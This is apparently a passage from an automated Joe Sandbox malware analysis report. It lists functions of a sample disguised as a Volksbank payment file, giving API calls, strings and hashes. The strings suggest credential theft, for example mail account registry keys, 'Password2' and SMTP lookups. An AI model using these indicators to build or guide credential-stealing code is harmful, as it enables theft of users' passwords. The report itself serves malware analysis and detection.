                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                                                                                                                                          Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                                                                          • String ID: smtp
                                                                                                                                                                                                                                          • API String ID: 2625860049-60245459
                                                                                                                                                                                                                                          • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                                                                                          • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                                                                          Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408258
                                                                                                                                                                                                                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Close$EnumOpenmemset
                                                                                                                                                                                                                                          • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                                                                          • API String ID: 2255314230-2212045309
                                                                                                                                                                                                                                          • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                                                                                          • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                                                                          Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                                                                          • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                                                                                                            • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FocusMessagePostmemset
                                                                                                                                                                                                                                          • String ID: S_@$l
                                                                                                                                                                                                                                          • API String ID: 3436799508-4018740455
                                                                                                                                                                                                                                          • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                                                                          • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                                                                          Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                                                                          • String ID: C^@$X$ini
                                                                                                                                                                                                                                          • API String ID: 714388716-917056472
                                                                                                                                                                                                                                          • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                                          • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                                                                          Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                                                                          • API String ID: 3492281209-168460110
                                                                                                                                                                                                                                          • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                                                                          • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                                                                          Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                                                                          • API String ID: 275601554-2167791130
                                                                                                                                                                                                                                          • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                                                                          • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                                                                          Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strlen$_mbscat
                                                                                                                                                                                                                                          • String ID: 3CD
                                                                                                                                                                                                                                          • API String ID: 3951308622-1938365332
                                                                                                                                                                                                                                          • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                                                                          • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                                                                          Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                                                          • String ID: Password2
                                                                                                                                                                                                                                          • API String ID: 2600922555-1856559283
                                                                                                                                                                                                                                          • Opcode ID: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                                                                                                                                                                          • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                                                                                                                                          Function 00410D0E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76940A60,?,00000000), ref: 00410D1C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                                                                          • API String ID: 2574300362-543337301
                                                                                                                                                                                                                                          • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                                                                          • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                                                                                                                                                                          Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID: rows deleted
                                                                                                                                                                                                                                          • API String ID: 2221118986-571615504
                                                                                                                                                                                                                                          • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                                          • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                                                                          Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                                                                          • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                                          • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                                                                                                                                          Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                                                          • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                                                                          • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                                                                          Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                                                          • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                                          • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                                                                          Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                                                          • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                                          • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                                                                                          Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                                                                          • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                          • API String ID: 2221118986-515162456
                                                                                                                                                                                                                                          • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
